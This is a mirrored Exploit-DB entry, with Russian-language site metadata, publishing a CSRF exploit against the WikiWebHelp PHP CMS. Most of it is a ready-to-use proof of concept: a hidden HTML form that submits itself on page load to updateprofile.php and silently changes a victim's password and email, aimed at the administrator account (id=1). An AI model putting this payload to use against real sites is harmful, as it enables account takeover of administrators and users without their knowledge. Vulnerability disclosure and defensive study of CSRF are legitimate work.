- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 15239
- Проверка EDB
-
- Пройдено
- Автор
- YOYAHACK
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-10-12
HTML:
#Blog: yoyahack.blogspot.com
#Site: foro.undersecurity.net
#Mail: [email protected]
#CMS: WikiWebHelp
The entire system is vulnerable to CSRF (Cross-site request forgery) since
this does not include a system to prevent CSRF attacks ...
Example
Change the password of users, including the administrator.
Exploit:
<form name="CSRF" method="post" action="
http://127.0.0.1/wwh/handlers/updateprofile.php?id=1">
<input type='hidden' name='pass' value='password'>
<input type='hidden' name='confirm' value='confirm_password'>
<input type='hidden' name='email' value='email'>
<input type='hidden' name='sub' value='on'>
<input type='hidden' name='id' value='1'>
<input type='hidden' name='subscribe' value='true'>
<script>document.CSRF.submit()</script>
- Источник
- www.exploit-db.com